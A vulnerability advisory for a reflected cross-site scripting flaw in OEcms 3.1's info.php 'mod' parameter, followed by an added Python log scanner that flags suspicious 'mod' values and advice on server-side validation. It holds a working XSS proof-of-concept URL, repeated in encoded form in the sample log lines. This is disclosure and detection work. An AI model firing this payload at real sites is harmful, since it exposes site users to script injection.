# Title: OEcms 3.1 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-06-15
# Software: OEcms v3.1
# CVE: CVE-2018-12095

# Technical Details & Description:
# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application.
# The vulnerability is located in the 'mod' parameter of the info.php action GET method request.

# PoC
http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>
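
A log check for the issue described above, as an added example that is not part of the original advisory: it flags requests to info.php whose 'mod' value, after percent-decoding, falls outside an identifier allow-list. The allow-list, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: legitimate 'mod' values are short identifiers such as "list".
SAFE_MOD = re.compile(r"[A-Za-z0-9_-]{1,32}")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[0-9.]+"')

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/2018:10:00:01 +0000] "GET /cms/info.php?mod=list HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Jun/2018:10:00:09 +0000] "GET /cms/info.php?mod=list%22%3C/%7C%5C%3E%3Cplaintext/onmouseover=prompt(/XSS/)%3E HTTP/1.1" 200 5342',
    '203.0.113.7 - - [15/Jun/2018:10:00:15 +0000] "GET /cms/info.php?id=3&mod=list%2522%253Cb%253E HTTP/1.1" 200 5201',
    '192.0.2.44 - - [15/Jun/2018:10:01:30 +0000] "GET /cms/index.php?mod=list HTTP/1.1" 200 4096',
]


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding, e.g. %2522 -> %22 -> a double quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(lines):
    """Return (client, decoded mod value) for info.php requests whose
    'mod' parameter falls outside the allow-list."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/info.php"):
            continue
        # parse_qsl already decodes once; fully_decode catches double encoding.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "mod" and not SAFE_MOD.fullmatch(fully_decode(value)):
                hits.append((client, fully_decode(value)))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} suspicious mod value: {value!r}")
```

The same allow-list can be enforced server-side before 'mod' is used, with HTML-encoding of the value wherever it is echoed into the page.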